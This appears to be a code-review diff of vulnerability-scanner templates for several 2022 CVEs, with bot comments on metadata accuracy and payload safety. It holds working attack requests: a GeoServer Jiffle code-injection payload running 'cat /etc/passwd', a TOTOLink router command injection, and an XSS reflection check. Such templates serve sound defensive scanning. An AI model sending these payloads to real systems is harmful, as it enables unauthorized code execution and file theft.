AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).
|
||||
AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/cve/CVE-2022-23854
|
||||
- https://www.aveva.com
|
||||
- https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854
|
||||
- https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-23854
|
||||
cwe-id: CWE-23
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"InTouch Access Anywhere"
|
||||
verified: "true"
|
||||
tags: lfi,packetstorm,cve,cve2022,aveva,intouch
|
||||
|
||||
requests:
|
||||
|
@ -38,3 +43,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
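Review bot: The rename to `Local File Inclusion` now sits next to `cwe-id: CWE-23` (relative path traversal), an `lfi` tag and a reference whose slug reads `path-traversal`, so the metadata disagrees with itself; the request is outside this hunk, but unless the template demonstrates inclusion and execution rather than an arbitrary file read, `Path Traversal` (or `Arbitrary File Read`) is the more accurate title for the CWE given. The new one-line description, `AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.`, also lost every detail of the old text; carrying the affected component and version range over from the CISA advisory would keep the template self-describing.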
|
||||
|
|
|
@ -0,0 +1,73 @@
|
|||
id: CVE-2022-24816
|
||||
|
||||
info:
|
||||
name: Geoserver Server - Code Injection
|
||||
author: mukundbhuva
|
||||
severity: critical
|
||||
description: |
|
||||
Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project Version < 1.1.22.
|
||||
reference:
|
||||
- https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-24816
|
||||
- https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx
|
||||
- https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-24816
|
||||
cwe-id: CWE-94
|
||||
metadata:
|
||||
fofa-query: app="GeoServer"
|
||||
shodan-query: /geoserver/
|
||||
verified: "true"
|
||||
tags: cve,cve2022,geoserver,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /geoserver/wms HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
|
||||
<ows:Identifier>ras:Jiffle</ows:Identifier>
|
||||
<wps:DataInputs>
|
||||
<wps:Input>
|
||||
<ows:Identifier>coverage</ows:Identifier>
|
||||
<wps:Data>
|
||||
<wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>
|
||||
</wps:Data>
|
||||
</wps:Input>
|
||||
<wps:Input>
|
||||
<ows:Identifier>script</ows:Identifier>
|
||||
<wps:Data>
|
||||
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
|
||||
</wps:Data>
|
||||
</wps:Input>
|
||||
<wps:Input>
|
||||
<ows:Identifier>outputType</ows:Identifier>
|
||||
<wps:Data>
|
||||
<wps:LiteralData>DOUBLE</wps:LiteralData>
|
||||
</wps:Data>
|
||||
</wps:Input>
|
||||
</wps:DataInputs>
|
||||
<wps:ResponseForm>
|
||||
<wps:RawDataOutput mimeType="image/tiff">
|
||||
<ows:Identifier>result</ows:Identifier>
|
||||
</wps:RawDataOutput>
|
||||
</wps:ResponseForm>
|
||||
</wps:Execute>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- "ExceptionInInitializerError"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
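Review bot: The Java payload in the `script` input (the `<wps:LiteralData>` line) runs `cat /etc/passwd` on the target and the first regex then requires `root:.*:0:0:` in the response, so a positive hit exfiltrates a sensitive file and the check misses any non-Unix host even though the code already executed. Keeping the same static-initializer/throw structure, a harmless marker proves execution equally well: change the exec to `java.lang.Runtime.getRuntime().exec("echo {{randstr}}")` and the first regex to `- "{{randstr}}"` (still Unix-flavoured, but it no longer reads a sensitive file). Because the template executes attacker-chosen code on the target, it presumably belongs under the repository's `intrusive` tag as well. The description's "GeoServer project Version < 1.1.22" reads as a GeoServer version, whereas 1.1.22 appears to be the jt-jiffle/jai-ext release from the linked GHSA, so naming the library there would avoid misleading triage. `shodan-query: /geoserver/` is also a bare path rather than a query expression, unlike the `http.html:"…"` form used elsewhere in this merge; confirm the intended Shodan filter.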
@ -0,0 +1,50 @@
|
|||
id: CVE-2022-25082
|
||||
|
||||
info:
|
||||
name: TOTOLink - Unauthenticated Command Injection
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: |
|
||||
TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2022-25082
|
||||
- https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-25082
|
||||
cwe-id: CWE-77
|
||||
tags: totolink,cve,cve2022,router,unauth,rce,iot
|
||||
|
||||
variables:
|
||||
cmd: "`ls>../{{randstr}}`"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /{{randstr}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- ".sh"
|
||||
- ".cgi"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header_2
|
||||
words:
|
||||
- 'application/octet-stream'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/11/05
|
|
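Review bot: The injected command in `cmd` (`` `ls>../{{randstr}}` ``) writes a file into the directory above the CGI handler on every device where the injection works, and no later request removes it, so each positive scan leaves an artifact on the router. If the write-then-fetch approach is kept, add `intrusive` to `tags` and consider a third raw request that injects `` `rm ../{{randstr}}` `` after the fetch; a marker returned inline or out-of-band would avoid the write altogether. The `body_2` matcher also needs both `.sh` and `.cgi` in the retrieved listing, which presumes the listed directory holds both file types on affected firmware; worth confirming against the reference write-up, or relaxing to `condition: or`.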
@ -1,16 +1,16 @@
|
|||
id: CVE-2022-26138
|
||||
|
||||
info:
|
||||
name: Questions For Confluence - Hardcoded Credentials
|
||||
name: Atlassian Questions For Confluence - Hardcoded Credentials
|
||||
author: HTTPVoid
|
||||
severity: critical
|
||||
description: |
|
||||
A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group.
|
||||
Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group.
|
||||
reference:
|
||||
- https://twitter.com/fluepke/status/1549892089181257729
|
||||
- https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-26138
|
||||
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-26138
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -40,3 +40,5 @@ requests:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- 'location == "/httpvoid.action"'
|
||||
|
||||
# Enhanced by md on 2023/01/06
|
||||
|
|
|
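Review bot: The `reference` list shows `https://nvd.nist.gov/vuln/detail/CVE-2022-26138` twice; this rendering drops the +/- markers, so if both entries are on the new side one of them should go, keeping the final one. The new description is otherwise clear; if the linked Atlassian advisory confirms it, a sentence noting that uninstalling the Questions for Confluence app does not remove the `disabledsystemuser` account would give a reader the remediation detail that matters most here.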
@ -1,16 +1,19 @@
|
|||
id: CVE-2022-26263
|
||||
|
||||
info:
|
||||
name: Yonyou u8 v13.0 - Cross Site Scripting
|
||||
name: Yonyou U8 13.0 - Cross-Site Scripting
|
||||
author: edoardottt,theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
Yonyou u8 v13.0 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability via the component /u8sl/WebHelp.
|
||||
Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-26263
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2022-26263
|
||||
cwe-id: CWE-80
|
||||
metadata:
|
||||
verified: true
|
||||
google-dork: inurl:/u8sl/WebHelp
|
||||
|
@ -29,3 +32,5 @@ headless:
|
|||
- '<frame src="javascript:console.log(document.domain)"'
|
||||
- 'webhelp4.js'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/13
|
||||
|
|
|
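Review bot: The added `metadata.verified: true` is an unquoted YAML boolean, while the other templates touched in this merge (AVEVA, GeoServer) carry the quoted string `verified: "true"`; one form should be used repository-wide so anything that filters on the field sees a single type. The second sentence added to the description is generic XSS boilerplate; since the CVSS vector records `PR:L/UI:R` (low privileges plus user interaction), a line such as `A low-privileged attacker can have a user who opens a crafted /u8sl/WebHelp URL execute attacker-controlled script in the context of the site.` tells a reader more than the cookie-theft sentence. The headless matcher that checks the `<frame src="javascript:…">` reflection sits in the second hunk and is unaffected.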
@ -1,16 +1,15 @@
|
|||
id: CVE-2022-27593
|
||||
|
||||
info:
|
||||
name: QNAP QTS Photo Station External Reference
|
||||
name: QNAP QTS Photo Station External Reference - Local File Inclusion
|
||||
author: allenwest24
|
||||
severity: critical
|
||||
description: |
|
||||
An externally controlled reference to a resource vulnerability has been reported to affect QNAP NAS running Photo Station. If exploited, This could allow an attacker to modify system files. We have already fixed the vulnerability in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later
|
||||
QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later.
|
||||
reference:
|
||||
- https://attackerkb.com/topics/7We3SjEYVo/cve-2022-27593
|
||||
- https://www.qnap.com/en/security-advisory/qsa-22-24
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-27593
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27593
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
|
||||
cvss-score: 9.1
|
||||
|
@ -39,3 +38,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
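Review bot: The new `name` and description now call this local file inclusion, but the `cvss-metrics` kept in the same hunk are `C:N/I:H/A:H` (no confidentiality impact) and the description itself says the impact is modifying system files, so the LFI label contradicts the template's own classification. The phrase `QNAP QTS Photo Station External Reference is vulnerable to …` also reads as if "External Reference" were a product name. Wording that matches the metadata: name `QNAP QTS Photo Station - Externally Controlled Reference to a Resource` and description `QNAP QTS Photo Station contains an externally controlled reference to a resource that allows a remote, unauthenticated attacker to modify system files.` The request and matchers are outside this hunk; if the check actually reads a file, keep the LFI wording but then the vector and the "modify" sentence need revisiting instead.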